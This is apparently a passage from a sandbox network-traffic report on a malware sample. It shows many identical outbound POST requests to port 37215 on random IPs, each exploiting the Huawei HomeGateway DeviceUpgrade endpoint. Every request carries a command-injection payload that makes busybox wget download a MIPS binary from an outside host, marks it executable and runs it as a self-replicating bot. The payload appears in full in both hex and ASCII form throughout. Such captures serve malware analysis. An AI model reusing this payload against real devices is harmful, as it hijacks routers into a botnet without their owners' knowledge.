3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1355192.168.2.1348806191.34.29.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558641911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1356192.168.2.1344754197.104.236.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558650017 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1357192.168.2.1341038157.114.79.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558654070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1358192.168.2.1360700157.196.45.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558690071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1359192.168.2.1342632197.6.183.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558995008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1360192.168.2.1345646141.185.144.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559012890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1361192.168.2.1353990157.26.104.3937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559026003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1362192.168.2.135326842.246.176.14637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559037924 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1363192.168.2.1357802160.18.127.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559051037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1364192.168.2.1344194157.200.167.4337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559070110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1365192.168.2.1348154157.197.48.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.559081078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
